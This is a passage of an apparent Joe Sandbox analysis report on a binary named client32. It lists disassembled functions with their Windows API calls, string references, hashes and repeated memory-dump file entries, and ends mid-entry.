                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __ctrlfp$__umatherr
                                                                                                                                                                                • String ID: H$
                                                                                                                                                                                • API String ID: 219961500-3767711040
                                                                                                                                                                                • Opcode ID: b070b5bcade51542ae747e8f61b81e977806f88a0f826aeab071b106a12c99c2
                                                                                                                                                                                • Instruction ID: 5c95312c82543953e66571946411be86268cce416e9f5e025ab4ef860d31e259
                                                                                                                                                                                • Opcode Fuzzy Hash: b070b5bcade51542ae747e8f61b81e977806f88a0f826aeab071b106a12c99c2
                                                                                                                                                                                • Instruction Fuzzy Hash: 71F0A07204860EEEDB003F80F805AAABFA1EF44328F914490F89C04189EF729078C356
                                                                                                                                                                                Function 11029790 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29threadCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00027530,00000000,00000000,?), ref: 110297DE
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateThread__wcstoi64
                                                                                                                                                                                • String ID: *TapiFixPeriod$Bridge
                                                                                                                                                                                • API String ID: 1152747075-2058455932
                                                                                                                                                                                • Opcode ID: 97c33e481902c1b27a229f9eefe8fd8a205d1462538e52262d5cd1e9e6653fb2
                                                                                                                                                                                • Instruction ID: 741f43c1c8d280c886d6f15773e052eeed2c6ce1e0fea61ed055b6fa2ceaecb0
                                                                                                                                                                                • Opcode Fuzzy Hash: 97c33e481902c1b27a229f9eefe8fd8a205d1462538e52262d5cd1e9e6653fb2
                                                                                                                                                                                • Instruction Fuzzy Hash: 24F0ED39B42338ABE711CEC1DC42F71B698A300708F0004B8F628A91C9E6B0A90083A6
                                                                                                                                                                                Function 1101D320 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26libraryloaderCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,FlashWindowEx), ref: 1101D334
                                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 1101D351
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressErrorLastProc
                                                                                                                                                                                • String ID: FlashWindowEx
                                                                                                                                                                                • API String ID: 199729137-2859592226
                                                                                                                                                                                • Opcode ID: bbe273fc43b33a73958d1f5ff023c045b956bd3b29a261bef0c34649876a7d0d
                                                                                                                                                                                • Instruction ID: 7fa6031e8bb94c9d2945b427b42de2899da1a72ad2875e3a9dcb47a7bac4ba5f
                                                                                                                                                                                • Opcode Fuzzy Hash: bbe273fc43b33a73958d1f5ff023c045b956bd3b29a261bef0c34649876a7d0d
                                                                                                                                                                                • Instruction Fuzzy Hash: 83E01272A412389FD324EBE9A848B4AF7E89B54765F01442AEA5597904C675E8408B90
                                                                                                                                                                                Function 11001090 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • SendDlgItemMessageA.USER32(?,?,?,?,?), ref: 110010C7
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                Strings
                                                                                                                                                                                • m_hWnd, xrefs: 110010A6
                                                                                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010A1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Message$ErrorExitItemLastProcessSendwsprintf
                                                                                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                • API String ID: 2046328329-2830328467
                                                                                                                                                                                • Opcode ID: 4864f4aac754c9cbc970fa32ff70f96c10e4216f36e3fd8ee466939e18e3d9af
                                                                                                                                                                                • Instruction ID: 55addf44b20248d1cdc7b1377ce96882c1c4f69405d532d8ba5fa0b62c56eca9
                                                                                                                                                                                • Opcode Fuzzy Hash: 4864f4aac754c9cbc970fa32ff70f96c10e4216f36e3fd8ee466939e18e3d9af
                                                                                                                                                                                • Instruction Fuzzy Hash: 8DE01AB661021DBFD714DE85EC81EEBB3ECEB49354F008529FA2A97240D6B0E850C7A5
                                                                                                                                                                                Function 11001050 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • SendMessageA.USER32(?,?,?,?), ref: 11001083
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                Strings
                                                                                                                                                                                • m_hWnd, xrefs: 11001066
                                                                                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001061
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                • API String ID: 819365019-2830328467
                                                                                                                                                                                • Opcode ID: 646dd4c3c328959be7a16d2c1c623d6ed7cdec1fea101c11bae4190cf6db257a
                                                                                                                                                                                • Instruction ID: 50f06fe94c134d50a88b9402c61dae4da10641179b5ac6344e644b67b4693846
                                                                                                                                                                                • Opcode Fuzzy Hash: 646dd4c3c328959be7a16d2c1c623d6ed7cdec1fea101c11bae4190cf6db257a
                                                                                                                                                                                • Instruction Fuzzy Hash: 6AE04FB5A00219BBD710DE95DC45EDBB3DCEB48354F00842AF92597240D6B0F84087A0
                                                                                                                                                                                Function 110010E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • PostMessageA.USER32(?,?,?,?), ref: 11001113
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                Strings
                                                                                                                                                                                • m_hWnd, xrefs: 110010F6
                                                                                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010F1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Message$ErrorExitLastPostProcesswsprintf
                                                                                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                • API String ID: 906220102-2830328467
                                                                                                                                                                                • Opcode ID: 3f9def0158565bcb4eef484d9d3183e19cddab025dd0f0af4dddb0b6d16337c0
                                                                                                                                                                                • Instruction ID: 934a8ee4ae924c1029923c78eea6d07b507986f249d0d3e5c029bc3c62824ea9
                                                                                                                                                                                • Opcode Fuzzy Hash: 3f9def0158565bcb4eef484d9d3183e19cddab025dd0f0af4dddb0b6d16337c0
                                                                                                                                                                                • Instruction Fuzzy Hash: 98E04FB5A10219BFD704CA85DC46EDAB39CEB48754F00802AF92597200D6B0E84087A0
                                                                                                                                                                                Function 110151A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • SendMessageA.USER32(?,00001014,?,?), ref: 110151D4
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                Strings
                                                                                                                                                                                • m_hWnd, xrefs: 110151B6
                                                                                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 110151B1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                                                                                                                • API String ID: 819365019-3966830984
                                                                                                                                                                                • Opcode ID: 7406112a8675d088bb7f9885aec66e8e2d2cc3c0cfef54bca229cf4c70f47dde
                                                                                                                                                                                • Instruction ID: 66f1678c741d69056f24fb38e5f1926d93c7d4e0e7c38f0779b183b432510f86
                                                                                                                                                                                • Opcode Fuzzy Hash: 7406112a8675d088bb7f9885aec66e8e2d2cc3c0cfef54bca229cf4c70f47dde
                                                                                                                                                                                • Instruction Fuzzy Hash: 26E08675A403197BD310DA81DC46ED6F39CDB45714F008025F9595A240D6B1B94087A0
                                                                                                                                                                                Function 110171F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • SendMessageA.USER32(?,0000101C,?,00000000), ref: 11017222
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                Strings
                                                                                                                                                                                • m_hWnd, xrefs: 11017206
                                                                                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 11017201
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                                                                                                                • API String ID: 819365019-3966830984
                                                                                                                                                                                • Opcode ID: 976f47f32fcea839de59f038edd4cf8004900680cdf178554bcd2a89ef6f537b
                                                                                                                                                                                • Instruction ID: ca461658ff4ad9fd457e958dedcd80386c4d58b841a73ce1d2056031be29817f
                                                                                                                                                                                • Opcode Fuzzy Hash: 976f47f32fcea839de59f038edd4cf8004900680cdf178554bcd2a89ef6f537b
                                                                                                                                                                                • Instruction Fuzzy Hash: 54E0C275A80329BBE2209681DC42FD6F38C9B05714F004435F6196A182D5B0F4408694
                                                                                                                                                                                Function 11001120 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • ShowWindow.USER32(?,?), ref: 1100114B
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                Strings
                                                                                                                                                                                • m_hWnd, xrefs: 11001136
                                                                                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001131
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorExitLastMessageProcessShowWindowwsprintf
                                                                                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                • API String ID: 1604732272-2830328467
                                                                                                                                                                                • Opcode ID: 75fb475fcd5ccd723eb668b149b2dbb62a97fe228b3072b5ea0554a1619b69bf
                                                                                                                                                                                • Instruction ID: 819250d5e51c5ae6cd1eebd62df6884d4c995cad7bb4673794d6e20848bff6e8
                                                                                                                                                                                • Opcode Fuzzy Hash: 75fb475fcd5ccd723eb668b149b2dbb62a97fe228b3072b5ea0554a1619b69bf
                                                                                                                                                                                • Instruction Fuzzy Hash: A0D02BB191032D7BC3048A81DC42ED6F3CCEB04365F004036F62656100D670E440C3D4
                                                                                                                                                                                Function 11001000 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19timeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • KillTimer.USER32(?,?), ref: 1100102B
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
